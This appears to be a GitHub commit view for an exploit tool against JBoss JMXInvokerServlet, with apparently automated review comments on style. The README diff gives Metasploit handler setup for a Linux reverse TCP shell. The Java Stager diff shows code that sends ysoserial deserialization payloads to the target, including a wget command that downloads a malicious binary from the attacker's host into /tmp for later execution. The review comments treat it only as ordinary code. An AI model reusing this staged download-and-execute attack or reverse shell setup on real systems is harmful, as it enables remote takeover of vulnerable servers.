Updated README with general information and added comments to Stager
njfox committed Nov 17, 2015
1 parent 7ac08e4 commit b59ab77
Showing 2 changed files with 22 additions and 0 deletions.
15 changes: 15 additions & 0 deletions README.md
Expand Up @@ -27,6 +27,21 @@ Coming soon.

Coming soon.


## Requirements

1. Metasploit Framework -- You must have a listener running in msfconsole before running this exploit. Example:
```shell
# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/shell/reverse_tcp
msf exploit(handler) > set LHOST <local ip>
msf exploit(handler) > set LPORT <local port>
msf exploit(handler) > exploit
```

2. msfvenom must be installed and available in your PATH. This command is used to generate the reverse shell payload.

## Installation

1. Download the latest jar from the "releases" section.
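
Review bot: In the new Requirements section, the ```shell fence under item 1 starts at column 0, so Markdown ends the numbered list at that point and item 2 is rendered as a separate list. Indent the fence and its contents to align with the text of item 1 so both requirements stay in one list. Inside the fence, `# msfconsole` uses `#` as a root prompt, which reads as a comment in a shell block; stating in the sentence before the fence that the commands are typed into msfconsole would avoid the ambiguity.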
7 changes: 7 additions & 0 deletions src/main/java/jbossexploit/Stager.java
Expand Up @@ -17,6 +17,8 @@ public static void sendPayload(int stage, String rhost, int rport, String lhost,
ysoserial.GeneratePayload ysoserial = new ysoserial.GeneratePayload();
String command = null;

// I was unable to chain commands ("&&") during testing, so we'll send 3 separate requests to download and execute
// the malicious binary
switch (stage) {
case 0:
command = "wget -O /tmp/" + binaryName + " http://" + lhost + ":" + wport + "/" + binaryName;
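
Review bot: The new comment above `switch (stage)` says three separate requests are sent, but `stage` is still a bare `int` and `case 0:` carries no label, so a reader has to infer which stage downloads and which executes. Replace the magic numbers with an enum or named constants and put a one-line comment on each case. The comment also records only the symptom (chaining with "&&" failed during testing); if the cause is known, state it here so the three-request design does not look arbitrary to a later maintainer.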
Expand All @@ -37,6 +39,8 @@ public static void sendPayload(int stage, String rhost, int rport, String lhost,
String url = "http://" + rhost + ":" + rport + "/invoker/JMXInvokerServlet";

DefaultHttpClient httpClient = new DefaultHttpClient();

// http://stackoverflow.com/questions/2836646/java-serializable-object-to-byte-array
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutput out = null;
byte[] payloadBytes = null;
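
Review bot: The comment added above `ByteArrayOutputStream bos` is a bare Stack Overflow URL, so the intent of the block is lost if the link rots. Say what the code does first, for example "Serialize the payload object to a byte array", and keep the URL after it as a reference. Separately, `ObjectOutput out = null;` declared ahead of use points to a manual try/finally close; if the project targets Java 7 or later, try-with-resources would be shorter and harder to get wrong.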
Expand Down Expand Up @@ -70,6 +74,9 @@ public static void sendPayload(int stage, String rhost, int rport, String lhost,
}

public static class HttpGetWithEntity extends HttpEntityEnclosingRequestBase {
// Allows adding content to the body of a GET request, as required by ysoserial
// http://stackoverflow.com/questions/12535016/apache-httpclient-get-with-body

public final static String METHOD_NAME = "GET";

@Override
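
Review bot: The description of `HttpGetWithEntity` sits inside the class body, after the opening brace, where documentation tools will not associate it with the class. Move it above the `public static class HttpGetWithEntity` line as a Javadoc comment, keeping the reference URL in it. While touching this class, `public final static String METHOD_NAME` would conventionally be written `public static final`.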